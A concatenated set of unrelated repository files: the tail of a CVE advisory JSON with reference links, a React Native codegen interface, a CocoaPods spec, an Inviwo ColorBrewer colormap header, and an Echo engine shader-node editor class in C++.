"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0921"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56556"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27018109"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/38459"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2010/0496"
}
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 545 |
2,928 | /**
* This code was generated by [react-native-codegen](https://www.npmjs.com/package/react-native-codegen).
*
* Do not edit this file as changes may cause incorrect behavior and will be lost
* once the code is regenerated.
*
* @generated by codegen project: GeneratePropsJavaInterface.js
*/
package com.facebook.react.viewmanagers;
import android.view.View;
public interface RNGestureHandlerRootViewManagerInterface<T extends View> {
// No props
}
| 133 |
310 | <reponame>dreeves/usesthis
{
"name": "SAVE",
"description": "Static analysis software for developers.",
"url": "http://www.coverity.com/products/coverity-save/"
} | 59 |
5,169 | {
"name": "Titanium",
"version": "0.7",
"license": "None",
"summary": "Image viewer library",
"description": " A library that provides a way to view full screen images from thumbnail previews.\n",
"homepage": "https://github.com/Quri/Titanium",
"authors": {
"<NAME>": "<EMAIL>"
},
"platforms": {
"ios": "7.0"
},
"source": {
"git": "<EMAIL>:quri/Titanium.git",
"tag": "0.7"
},
"source_files": "Titanium/Titanium/*.{h,m}",
"requires_arc": true
}
| 219 |
349 | /*********************************************************************************
*
* Inviwo - Interactive Visualization Workshop
*
* Copyright (c) 2014-2021 Inviwo Foundation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*********************************************************************************/
/*
This complete file is auto-generated with python script
tools/codegen/colorbrewer/colorbrewer.py
*/
#pragma once
#include <inviwo/core/common/inviwocoredefine.h>
#include <inviwo/core/util/glm.h>
#include <vector>
#include <ostream>
namespace inviwo {
namespace colorbrewer {
// clang-format off
enum class Colormap {
Accent_1, Accent_2, Accent_3, Accent_4, Accent_5, Accent_6, Accent_7, Accent_8,
Blues_3, Blues_4, Blues_5, Blues_6, Blues_7, Blues_8, Blues_9,
BrBG_3, BrBG_4, BrBG_5, BrBG_6, BrBG_7, BrBG_8, BrBG_9, BrBG_10, BrBG_11,
BuGn_3, BuGn_4, BuGn_5, BuGn_6, BuGn_7, BuGn_8, BuGn_9,
BuPu_3, BuPu_4, BuPu_5, BuPu_6, BuPu_7, BuPu_8, BuPu_9,
Dark2_3, Dark2_4, Dark2_5, Dark2_6, Dark2_7, Dark2_8,
GnBu_3, GnBu_4, GnBu_5, GnBu_6, GnBu_7, GnBu_8, GnBu_9,
Greens_3, Greens_4, Greens_5, Greens_6, Greens_7, Greens_8, Greens_9,
Greys_3, Greys_4, Greys_5, Greys_6, Greys_7, Greys_8, Greys_9,
OrRd_3, OrRd_4, OrRd_5, OrRd_6, OrRd_7, OrRd_8, OrRd_9,
Oranges_3, Oranges_4, Oranges_5, Oranges_6, Oranges_7, Oranges_8, Oranges_9,
PRGn_3, PRGn_4, PRGn_5, PRGn_6, PRGn_7, PRGn_8, PRGn_9, PRGn_10, PRGn_11,
Paired_1, Paired_2, Paired_3, Paired_4, Paired_5, Paired_6, Paired_7, Paired_8, Paired_9, Paired_10, Paired_11, Paired_12,
Pastel1_3, Pastel1_4, Pastel1_5, Pastel1_6, Pastel1_7, Pastel1_8, Pastel1_9,
Pastel2_3, Pastel2_4, Pastel2_5, Pastel2_6, Pastel2_7, Pastel2_8,
PiYG_3, PiYG_4, PiYG_5, PiYG_6, PiYG_7, PiYG_8, PiYG_9, PiYG_10, PiYG_11,
PuBu_3, PuBu_4, PuBu_5, PuBu_6, PuBu_7, PuBu_8, PuBu_9,
PuBuGn_3, PuBuGn_4, PuBuGn_5, PuBuGn_6, PuBuGn_7, PuBuGn_8, PuBuGn_9,
PuOr_3, PuOr_4, PuOr_5, PuOr_6, PuOr_7, PuOr_8, PuOr_9, PuOr_10, PuOr_11,
PuRd_3, PuRd_4, PuRd_5, PuRd_6, PuRd_7, PuRd_8, PuRd_9,
Purples_3, Purples_4, Purples_5, Purples_6, Purples_7, Purples_8, Purples_9,
RdBu_3, RdBu_4, RdBu_5, RdBu_6, RdBu_7, RdBu_8, RdBu_9, RdBu_10, RdBu_11,
RdGy_3, RdGy_4, RdGy_5, RdGy_6, RdGy_7, RdGy_8, RdGy_9, RdGy_10, RdGy_11,
RdPu_3, RdPu_4, RdPu_5, RdPu_6, RdPu_7, RdPu_8, RdPu_9,
RdYlBu_3, RdYlBu_4, RdYlBu_5, RdYlBu_6, RdYlBu_7, RdYlBu_8, RdYlBu_9, RdYlBu_10, RdYlBu_11,
RdYlGn_3, RdYlGn_4, RdYlGn_5, RdYlGn_6, RdYlGn_7, RdYlGn_8, RdYlGn_9, RdYlGn_10, RdYlGn_11,
Reds_3, Reds_4, Reds_5, Reds_6, Reds_7, Reds_8, Reds_9,
Set1_1, Set1_2, Set1_3, Set1_4, Set1_5, Set1_6, Set1_7, Set1_8, Set1_9,
Set2_1, Set2_2, Set2_3, Set2_4, Set2_5, Set2_6, Set2_7, Set2_8,
Set3_3, Set3_4, Set3_5, Set3_6, Set3_7, Set3_8, Set3_9, Set3_10, Set3_11, Set3_12,
Spectral_3, Spectral_4, Spectral_5, Spectral_6, Spectral_7, Spectral_8, Spectral_9, Spectral_10, Spectral_11,
YlGn_3, YlGn_4, YlGn_5, YlGn_6, YlGn_7, YlGn_8, YlGn_9,
YlGnBu_3, YlGnBu_4, YlGnBu_5, YlGnBu_6, YlGnBu_7, YlGnBu_8, YlGnBu_9,
YlOrBr_3, YlOrBr_4, YlOrBr_5, YlOrBr_6, YlOrBr_7, YlOrBr_8, YlOrBr_9,
YlOrRd_3, YlOrRd_4, YlOrRd_5, YlOrRd_6, YlOrRd_7, YlOrRd_8,
FirstMap=Accent_1, LastMap=YlOrRd_8
};
enum class Category { Diverging, Qualitative, Sequential, NumberOfColormapCategories, Undefined };
enum class Family {
Accent, Blues, BrBG, BuGn, BuPu, Dark2, GnBu,
Greens, Greys, OrRd, Oranges, PRGn, Paired, Pastel1,
Pastel2, PiYG, PuBu, PuBuGn, PuOr, PuRd, Purples,
RdBu, RdGy, RdPu, RdYlBu, RdYlGn, Reds, Set1,
Set2, Set3, Spectral, YlGn, YlGnBu, YlOrBr, YlOrRd,
NumberOfColormapFamilies, Undefined
};
// clang-format on
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os,
Colormap colormap) {
switch (colormap) {
// clang-format off
case Colormap::Accent_1: os << "Accent_1"; break;
case Colormap::Accent_2: os << "Accent_2"; break;
case Colormap::Accent_3: os << "Accent_3"; break;
case Colormap::Accent_4: os << "Accent_4"; break;
case Colormap::Accent_5: os << "Accent_5"; break;
case Colormap::Accent_6: os << "Accent_6"; break;
case Colormap::Accent_7: os << "Accent_7"; break;
case Colormap::Accent_8: os << "Accent_8"; break;
case Colormap::Blues_3: os << "Blues_3"; break;
case Colormap::Blues_4: os << "Blues_4"; break;
case Colormap::Blues_5: os << "Blues_5"; break;
case Colormap::Blues_6: os << "Blues_6"; break;
case Colormap::Blues_7: os << "Blues_7"; break;
case Colormap::Blues_8: os << "Blues_8"; break;
case Colormap::Blues_9: os << "Blues_9"; break;
case Colormap::BrBG_3: os << "BrBG_3"; break;
case Colormap::BrBG_4: os << "BrBG_4"; break;
case Colormap::BrBG_5: os << "BrBG_5"; break;
case Colormap::BrBG_6: os << "BrBG_6"; break;
case Colormap::BrBG_7: os << "BrBG_7"; break;
case Colormap::BrBG_8: os << "BrBG_8"; break;
case Colormap::BrBG_9: os << "BrBG_9"; break;
case Colormap::BrBG_10: os << "BrBG_10"; break;
case Colormap::BrBG_11: os << "BrBG_11"; break;
case Colormap::BuGn_3: os << "BuGn_3"; break;
case Colormap::BuGn_4: os << "BuGn_4"; break;
case Colormap::BuGn_5: os << "BuGn_5"; break;
case Colormap::BuGn_6: os << "BuGn_6"; break;
case Colormap::BuGn_7: os << "BuGn_7"; break;
case Colormap::BuGn_8: os << "BuGn_8"; break;
case Colormap::BuGn_9: os << "BuGn_9"; break;
case Colormap::BuPu_3: os << "BuPu_3"; break;
case Colormap::BuPu_4: os << "BuPu_4"; break;
case Colormap::BuPu_5: os << "BuPu_5"; break;
case Colormap::BuPu_6: os << "BuPu_6"; break;
case Colormap::BuPu_7: os << "BuPu_7"; break;
case Colormap::BuPu_8: os << "BuPu_8"; break;
case Colormap::BuPu_9: os << "BuPu_9"; break;
case Colormap::Dark2_3: os << "Dark2_3"; break;
case Colormap::Dark2_4: os << "Dark2_4"; break;
case Colormap::Dark2_5: os << "Dark2_5"; break;
case Colormap::Dark2_6: os << "Dark2_6"; break;
case Colormap::Dark2_7: os << "Dark2_7"; break;
case Colormap::Dark2_8: os << "Dark2_8"; break;
case Colormap::GnBu_3: os << "GnBu_3"; break;
case Colormap::GnBu_4: os << "GnBu_4"; break;
case Colormap::GnBu_5: os << "GnBu_5"; break;
case Colormap::GnBu_6: os << "GnBu_6"; break;
case Colormap::GnBu_7: os << "GnBu_7"; break;
case Colormap::GnBu_8: os << "GnBu_8"; break;
case Colormap::GnBu_9: os << "GnBu_9"; break;
case Colormap::Greens_3: os << "Greens_3"; break;
case Colormap::Greens_4: os << "Greens_4"; break;
case Colormap::Greens_5: os << "Greens_5"; break;
case Colormap::Greens_6: os << "Greens_6"; break;
case Colormap::Greens_7: os << "Greens_7"; break;
case Colormap::Greens_8: os << "Greens_8"; break;
case Colormap::Greens_9: os << "Greens_9"; break;
case Colormap::Greys_3: os << "Greys_3"; break;
case Colormap::Greys_4: os << "Greys_4"; break;
case Colormap::Greys_5: os << "Greys_5"; break;
case Colormap::Greys_6: os << "Greys_6"; break;
case Colormap::Greys_7: os << "Greys_7"; break;
case Colormap::Greys_8: os << "Greys_8"; break;
case Colormap::Greys_9: os << "Greys_9"; break;
case Colormap::OrRd_3: os << "OrRd_3"; break;
case Colormap::OrRd_4: os << "OrRd_4"; break;
case Colormap::OrRd_5: os << "OrRd_5"; break;
case Colormap::OrRd_6: os << "OrRd_6"; break;
case Colormap::OrRd_7: os << "OrRd_7"; break;
case Colormap::OrRd_8: os << "OrRd_8"; break;
case Colormap::OrRd_9: os << "OrRd_9"; break;
case Colormap::Oranges_3: os << "Oranges_3"; break;
case Colormap::Oranges_4: os << "Oranges_4"; break;
case Colormap::Oranges_5: os << "Oranges_5"; break;
case Colormap::Oranges_6: os << "Oranges_6"; break;
case Colormap::Oranges_7: os << "Oranges_7"; break;
case Colormap::Oranges_8: os << "Oranges_8"; break;
case Colormap::Oranges_9: os << "Oranges_9"; break;
case Colormap::PRGn_3: os << "PRGn_3"; break;
case Colormap::PRGn_4: os << "PRGn_4"; break;
case Colormap::PRGn_5: os << "PRGn_5"; break;
case Colormap::PRGn_6: os << "PRGn_6"; break;
case Colormap::PRGn_7: os << "PRGn_7"; break;
case Colormap::PRGn_8: os << "PRGn_8"; break;
case Colormap::PRGn_9: os << "PRGn_9"; break;
case Colormap::PRGn_10: os << "PRGn_10"; break;
case Colormap::PRGn_11: os << "PRGn_11"; break;
case Colormap::Paired_1: os << "Paired_1"; break;
case Colormap::Paired_2: os << "Paired_2"; break;
case Colormap::Paired_3: os << "Paired_3"; break;
case Colormap::Paired_4: os << "Paired_4"; break;
case Colormap::Paired_5: os << "Paired_5"; break;
case Colormap::Paired_6: os << "Paired_6"; break;
case Colormap::Paired_7: os << "Paired_7"; break;
case Colormap::Paired_8: os << "Paired_8"; break;
case Colormap::Paired_9: os << "Paired_9"; break;
case Colormap::Paired_10: os << "Paired_10"; break;
case Colormap::Paired_11: os << "Paired_11"; break;
case Colormap::Paired_12: os << "Paired_12"; break;
case Colormap::Pastel1_3: os << "Pastel1_3"; break;
case Colormap::Pastel1_4: os << "Pastel1_4"; break;
case Colormap::Pastel1_5: os << "Pastel1_5"; break;
case Colormap::Pastel1_6: os << "Pastel1_6"; break;
case Colormap::Pastel1_7: os << "Pastel1_7"; break;
case Colormap::Pastel1_8: os << "Pastel1_8"; break;
case Colormap::Pastel1_9: os << "Pastel1_9"; break;
case Colormap::Pastel2_3: os << "Pastel2_3"; break;
case Colormap::Pastel2_4: os << "Pastel2_4"; break;
case Colormap::Pastel2_5: os << "Pastel2_5"; break;
case Colormap::Pastel2_6: os << "Pastel2_6"; break;
case Colormap::Pastel2_7: os << "Pastel2_7"; break;
case Colormap::Pastel2_8: os << "Pastel2_8"; break;
case Colormap::PiYG_3: os << "PiYG_3"; break;
case Colormap::PiYG_4: os << "PiYG_4"; break;
case Colormap::PiYG_5: os << "PiYG_5"; break;
case Colormap::PiYG_6: os << "PiYG_6"; break;
case Colormap::PiYG_7: os << "PiYG_7"; break;
case Colormap::PiYG_8: os << "PiYG_8"; break;
case Colormap::PiYG_9: os << "PiYG_9"; break;
case Colormap::PiYG_10: os << "PiYG_10"; break;
case Colormap::PiYG_11: os << "PiYG_11"; break;
case Colormap::PuBu_3: os << "PuBu_3"; break;
case Colormap::PuBu_4: os << "PuBu_4"; break;
case Colormap::PuBu_5: os << "PuBu_5"; break;
case Colormap::PuBu_6: os << "PuBu_6"; break;
case Colormap::PuBu_7: os << "PuBu_7"; break;
case Colormap::PuBu_8: os << "PuBu_8"; break;
case Colormap::PuBu_9: os << "PuBu_9"; break;
case Colormap::PuBuGn_3: os << "PuBuGn_3"; break;
case Colormap::PuBuGn_4: os << "PuBuGn_4"; break;
case Colormap::PuBuGn_5: os << "PuBuGn_5"; break;
case Colormap::PuBuGn_6: os << "PuBuGn_6"; break;
case Colormap::PuBuGn_7: os << "PuBuGn_7"; break;
case Colormap::PuBuGn_8: os << "PuBuGn_8"; break;
case Colormap::PuBuGn_9: os << "PuBuGn_9"; break;
case Colormap::PuOr_3: os << "PuOr_3"; break;
case Colormap::PuOr_4: os << "PuOr_4"; break;
case Colormap::PuOr_5: os << "PuOr_5"; break;
case Colormap::PuOr_6: os << "PuOr_6"; break;
case Colormap::PuOr_7: os << "PuOr_7"; break;
case Colormap::PuOr_8: os << "PuOr_8"; break;
case Colormap::PuOr_9: os << "PuOr_9"; break;
case Colormap::PuOr_10: os << "PuOr_10"; break;
case Colormap::PuOr_11: os << "PuOr_11"; break;
case Colormap::PuRd_3: os << "PuRd_3"; break;
case Colormap::PuRd_4: os << "PuRd_4"; break;
case Colormap::PuRd_5: os << "PuRd_5"; break;
case Colormap::PuRd_6: os << "PuRd_6"; break;
case Colormap::PuRd_7: os << "PuRd_7"; break;
case Colormap::PuRd_8: os << "PuRd_8"; break;
case Colormap::PuRd_9: os << "PuRd_9"; break;
case Colormap::Purples_3: os << "Purples_3"; break;
case Colormap::Purples_4: os << "Purples_4"; break;
case Colormap::Purples_5: os << "Purples_5"; break;
case Colormap::Purples_6: os << "Purples_6"; break;
case Colormap::Purples_7: os << "Purples_7"; break;
case Colormap::Purples_8: os << "Purples_8"; break;
case Colormap::Purples_9: os << "Purples_9"; break;
case Colormap::RdBu_3: os << "RdBu_3"; break;
case Colormap::RdBu_4: os << "RdBu_4"; break;
case Colormap::RdBu_5: os << "RdBu_5"; break;
case Colormap::RdBu_6: os << "RdBu_6"; break;
case Colormap::RdBu_7: os << "RdBu_7"; break;
case Colormap::RdBu_8: os << "RdBu_8"; break;
case Colormap::RdBu_9: os << "RdBu_9"; break;
case Colormap::RdBu_10: os << "RdBu_10"; break;
case Colormap::RdBu_11: os << "RdBu_11"; break;
case Colormap::RdGy_3: os << "RdGy_3"; break;
case Colormap::RdGy_4: os << "RdGy_4"; break;
case Colormap::RdGy_5: os << "RdGy_5"; break;
case Colormap::RdGy_6: os << "RdGy_6"; break;
case Colormap::RdGy_7: os << "RdGy_7"; break;
case Colormap::RdGy_8: os << "RdGy_8"; break;
case Colormap::RdGy_9: os << "RdGy_9"; break;
case Colormap::RdGy_10: os << "RdGy_10"; break;
case Colormap::RdGy_11: os << "RdGy_11"; break;
case Colormap::RdPu_3: os << "RdPu_3"; break;
case Colormap::RdPu_4: os << "RdPu_4"; break;
case Colormap::RdPu_5: os << "RdPu_5"; break;
case Colormap::RdPu_6: os << "RdPu_6"; break;
case Colormap::RdPu_7: os << "RdPu_7"; break;
case Colormap::RdPu_8: os << "RdPu_8"; break;
case Colormap::RdPu_9: os << "RdPu_9"; break;
case Colormap::RdYlBu_3: os << "RdYlBu_3"; break;
case Colormap::RdYlBu_4: os << "RdYlBu_4"; break;
case Colormap::RdYlBu_5: os << "RdYlBu_5"; break;
case Colormap::RdYlBu_6: os << "RdYlBu_6"; break;
case Colormap::RdYlBu_7: os << "RdYlBu_7"; break;
case Colormap::RdYlBu_8: os << "RdYlBu_8"; break;
case Colormap::RdYlBu_9: os << "RdYlBu_9"; break;
case Colormap::RdYlBu_10: os << "RdYlBu_10"; break;
case Colormap::RdYlBu_11: os << "RdYlBu_11"; break;
case Colormap::RdYlGn_3: os << "RdYlGn_3"; break;
case Colormap::RdYlGn_4: os << "RdYlGn_4"; break;
case Colormap::RdYlGn_5: os << "RdYlGn_5"; break;
case Colormap::RdYlGn_6: os << "RdYlGn_6"; break;
case Colormap::RdYlGn_7: os << "RdYlGn_7"; break;
case Colormap::RdYlGn_8: os << "RdYlGn_8"; break;
case Colormap::RdYlGn_9: os << "RdYlGn_9"; break;
case Colormap::RdYlGn_10: os << "RdYlGn_10"; break;
case Colormap::RdYlGn_11: os << "RdYlGn_11"; break;
case Colormap::Reds_3: os << "Reds_3"; break;
case Colormap::Reds_4: os << "Reds_4"; break;
case Colormap::Reds_5: os << "Reds_5"; break;
case Colormap::Reds_6: os << "Reds_6"; break;
case Colormap::Reds_7: os << "Reds_7"; break;
case Colormap::Reds_8: os << "Reds_8"; break;
case Colormap::Reds_9: os << "Reds_9"; break;
case Colormap::Set1_1: os << "Set1_1"; break;
case Colormap::Set1_2: os << "Set1_2"; break;
case Colormap::Set1_3: os << "Set1_3"; break;
case Colormap::Set1_4: os << "Set1_4"; break;
case Colormap::Set1_5: os << "Set1_5"; break;
case Colormap::Set1_6: os << "Set1_6"; break;
case Colormap::Set1_7: os << "Set1_7"; break;
case Colormap::Set1_8: os << "Set1_8"; break;
case Colormap::Set1_9: os << "Set1_9"; break;
case Colormap::Set2_1: os << "Set2_1"; break;
case Colormap::Set2_2: os << "Set2_2"; break;
case Colormap::Set2_3: os << "Set2_3"; break;
case Colormap::Set2_4: os << "Set2_4"; break;
case Colormap::Set2_5: os << "Set2_5"; break;
case Colormap::Set2_6: os << "Set2_6"; break;
case Colormap::Set2_7: os << "Set2_7"; break;
case Colormap::Set2_8: os << "Set2_8"; break;
case Colormap::Set3_3: os << "Set3_3"; break;
case Colormap::Set3_4: os << "Set3_4"; break;
case Colormap::Set3_5: os << "Set3_5"; break;
case Colormap::Set3_6: os << "Set3_6"; break;
case Colormap::Set3_7: os << "Set3_7"; break;
case Colormap::Set3_8: os << "Set3_8"; break;
case Colormap::Set3_9: os << "Set3_9"; break;
case Colormap::Set3_10: os << "Set3_10"; break;
case Colormap::Set3_11: os << "Set3_11"; break;
case Colormap::Set3_12: os << "Set3_12"; break;
case Colormap::Spectral_3: os << "Spectral_3"; break;
case Colormap::Spectral_4: os << "Spectral_4"; break;
case Colormap::Spectral_5: os << "Spectral_5"; break;
case Colormap::Spectral_6: os << "Spectral_6"; break;
case Colormap::Spectral_7: os << "Spectral_7"; break;
case Colormap::Spectral_8: os << "Spectral_8"; break;
case Colormap::Spectral_9: os << "Spectral_9"; break;
case Colormap::Spectral_10: os << "Spectral_10"; break;
case Colormap::Spectral_11: os << "Spectral_11"; break;
case Colormap::YlGn_3: os << "YlGn_3"; break;
case Colormap::YlGn_4: os << "YlGn_4"; break;
case Colormap::YlGn_5: os << "YlGn_5"; break;
case Colormap::YlGn_6: os << "YlGn_6"; break;
case Colormap::YlGn_7: os << "YlGn_7"; break;
case Colormap::YlGn_8: os << "YlGn_8"; break;
case Colormap::YlGn_9: os << "YlGn_9"; break;
case Colormap::YlGnBu_3: os << "YlGnBu_3"; break;
case Colormap::YlGnBu_4: os << "YlGnBu_4"; break;
case Colormap::YlGnBu_5: os << "YlGnBu_5"; break;
case Colormap::YlGnBu_6: os << "YlGnBu_6"; break;
case Colormap::YlGnBu_7: os << "YlGnBu_7"; break;
case Colormap::YlGnBu_8: os << "YlGnBu_8"; break;
case Colormap::YlGnBu_9: os << "YlGnBu_9"; break;
case Colormap::YlOrBr_3: os << "YlOrBr_3"; break;
case Colormap::YlOrBr_4: os << "YlOrBr_4"; break;
case Colormap::YlOrBr_5: os << "YlOrBr_5"; break;
case Colormap::YlOrBr_6: os << "YlOrBr_6"; break;
case Colormap::YlOrBr_7: os << "YlOrBr_7"; break;
case Colormap::YlOrBr_8: os << "YlOrBr_8"; break;
case Colormap::YlOrBr_9: os << "YlOrBr_9"; break;
case Colormap::YlOrRd_3: os << "YlOrRd_3"; break;
case Colormap::YlOrRd_4: os << "YlOrRd_4"; break;
case Colormap::YlOrRd_5: os << "YlOrRd_5"; break;
case Colormap::YlOrRd_6: os << "YlOrRd_6"; break;
case Colormap::YlOrRd_7: os << "YlOrRd_7"; break;
case Colormap::YlOrRd_8: os << "YlOrRd_8"; break;
// clang-format on
}
return os;
}
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os,
Category category) {
switch (category) {
// clang-format off
case Category::Diverging: os << "Diverging"; break;
case Category::Qualitative: os << "Qualitative"; break;
case Category::Sequential: os << "Sequential"; break;
case Category::NumberOfColormapCategories: os << "NumberOfColormapCategories"; break;
case Category::Undefined: os << "Undefined"; break;
// clang-format on
}
return os;
}
template <class Elem, class Traits>
std::basic_ostream<Elem, Traits>& operator<<(std::basic_ostream<Elem, Traits>& os, Family family) {
switch (family) {
// clang-format off
case Family::Accent: os << "Accent"; break;
case Family::Blues: os << "Blues"; break;
case Family::BrBG: os << "BrBG"; break;
case Family::BuGn: os << "BuGn"; break;
case Family::BuPu: os << "BuPu"; break;
case Family::Dark2: os << "Dark2"; break;
case Family::GnBu: os << "GnBu"; break;
case Family::Greens: os << "Greens"; break;
case Family::Greys: os << "Greys"; break;
case Family::OrRd: os << "OrRd"; break;
case Family::Oranges: os << "Oranges"; break;
case Family::PRGn: os << "PRGn"; break;
case Family::Paired: os << "Paired"; break;
case Family::Pastel1: os << "Pastel1"; break;
case Family::Pastel2: os << "Pastel2"; break;
case Family::PiYG: os << "PiYG"; break;
case Family::PuBu: os << "PuBu"; break;
case Family::PuBuGn: os << "PuBuGn"; break;
case Family::PuOr: os << "PuOr"; break;
case Family::PuRd: os << "PuRd"; break;
case Family::Purples: os << "Purples"; break;
case Family::RdBu: os << "RdBu"; break;
case Family::RdGy: os << "RdGy"; break;
case Family::RdPu: os << "RdPu"; break;
case Family::RdYlBu: os << "RdYlBu"; break;
case Family::RdYlGn: os << "RdYlGn"; break;
case Family::Reds: os << "Reds"; break;
case Family::Set1: os << "Set1"; break;
case Family::Set2: os << "Set2"; break;
case Family::Set3: os << "Set3"; break;
case Family::Spectral: os << "Spectral"; break;
case Family::YlGn: os << "YlGn"; break;
case Family::YlGnBu: os << "YlGnBu"; break;
case Family::YlOrBr: os << "YlOrBr"; break;
case Family::YlOrRd: os << "YlOrRd"; break;
case Family::NumberOfColormapFamilies: os << "NumberOfColormapFamilies"; break;
case Family::Undefined: os << "Undefined"; break;
// clang-format on
}
return os;
}
/**
* Returns the specified colormap. For reference see http://colorbrewer2.org/
**/
IVW_CORE_API const std::vector<dvec4>& getColormap(Colormap colormap);
/**
* Returns the minimum number of colors for which the requested family is available.
**/
IVW_CORE_API glm::uint8 getMinNumberOfColorsForFamily(const Family& family);
/**
* Returns the maximum number of colors for which the requested family is available.
**/
IVW_CORE_API glm::uint8 getMaxNumberOfColorsForFamily(const Family& family);
/**
* Returns all families contained in the specified category.
**/
IVW_CORE_API std::vector<Family> getFamiliesForCategory(const Category& category);
} // namespace colorbrewer
} // namespace inviwo
| 12,270 |
675 | #include "shader_node.h"
#ifdef ECHO_EDITOR_MODE
#include <nodeeditor/Connection>
namespace Echo
{
ShaderNode::ShaderNode()
: Object()
{
}
ShaderNode::~ShaderNode()
{
EditorApi.showObjectProperty(nullptr);
}
void ShaderNode::bindMethods()
{
CLASS_BIND_METHOD(ShaderNode, getVariableName);
CLASS_BIND_METHOD(ShaderNode, setVariableName);
CLASS_REGISTER_PROPERTY(ShaderNode, "Variable", Variant::Type::String, getVariableName, setVariableName);
}
unsigned int ShaderNode::nPorts(QtNodes::PortType portType) const
{
switch (portType)
{
case QtNodes::PortType::In: return m_inputs.size();
case QtNodes::PortType::Out:return m_outputs.size();
default: return 0;
}
}
NodeDataType ShaderNode::dataType(QtNodes::PortType portType, QtNodes::PortIndex portIndex) const
{
if (portType == QtNodes::PortType::In)
{
return m_inputDataTypes[portIndex];
}
else if (portType == QtNodes::PortType::Out)
{
return m_outputs[portIndex]->type();
}
return NodeDataType{ "invalid", "invalid" };
}
std::shared_ptr<NodeData> ShaderNode::outData(QtNodes::PortIndex portIndex)
{
if(m_outputs.size()>portIndex)
return m_outputs[portIndex];
else
return std::make_shared<DataInvalid>(this);
}
void ShaderNode::setInData(std::shared_ptr<NodeData> nodeData, int portIndex)
{
m_inputs[portIndex] = std::dynamic_pointer_cast<ShaderData>(nodeData);
}
bool ShaderNode::checkValidation()
{
m_modelValidationState = QtNodes::NodeValidationState::Valid;
m_modelValidationError = QStringLiteral("");
// check
if (m_inputDataTypes.size() != m_inputs.size())
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = QStringLiteral("Inputs count error");
return false;
}
// input type check
for (size_t i = 0; i < m_inputDataTypes.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id != m_inputDataTypes[i].id)
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] type error", i).c_str();
return false;
}
}
// check invalid input
for (size_t i = 0; i < m_inputs.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
}
// check invalid output
for (size_t i = 0; i < m_inputs.size(); i++)
{
if (m_inputs[i] && m_inputs[i]->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
else if (m_inputs[i] && m_inputs[i]->type().id == "any")
{
std::shared_ptr<ShaderData> internalData = DataAny::getInternalData(m_inputs[i]);
if (internalData && internalData->type().id == "invalid")
{
m_modelValidationState = QtNodes::NodeValidationState::Error;
m_modelValidationError = Echo::StringUtil::Format("Input [%d] is invalid", i).c_str();
return false;
}
}
}
return true;
}
QJsonObject ShaderNode::save() const
{
QJsonObject nodeJson = NodeDataModel::save();
saveShaderNode(nodeJson);
return nodeJson;
}
void ShaderNode::restore(QJsonObject const& p)
{
restoreShaderNode(p);
}
void ShaderNode::saveShaderNode(QJsonObject& p) const
{
const Object* obj = this;
Echo::PropertyInfos properties;
Echo::Class::getPropertys(getClassName(), (Object*)obj, properties, PropertyInfo::Static | PropertyInfo::Dynamic, true);
for (Echo::PropertyInfo* prop : properties)
{
Echo::Variant variant;
Echo::Class::getPropertyValue((Object*)obj, prop->m_name, variant);
p[prop->m_name.c_str()] = variant.toString().c_str();
}
}
void ShaderNode::restoreShaderNode(QJsonObject const& p)
{
Echo::Object* obj = this;
Echo::PropertyInfos properties;
Echo::Class::getPropertys(getClassName(), obj, properties, 3, true);
for (Echo::PropertyInfo* prop : properties)
{
QJsonValue v = p[prop->m_name.c_str()];
if (!v.isUndefined())
{
Echo::String value = v.toString().toStdString().c_str();
Echo::Variant variant;
variant.fromString(prop->m_type, value);
Echo::Class::setPropertyValue(obj, prop->m_name, variant);
}
}
}
bool ShaderNode::onNodePressed()
{
EditorApi.showObjectProperty(this);
return true;
}
String ShaderNode::getVariableName() const
{
if (m_variableName.empty())
{
Echo::String variableName = name().toStdString().c_str() + Echo::StringUtil::Format("_%d", m_id);
variableName = Echo::StringUtil::Replace(variableName, " ", "");
return variableName;
}
return m_variableName;
}
void ShaderNode::setVariableName(const String& variableName)
{
m_variableName = variableName;
Q_EMIT captionUpdated();
}
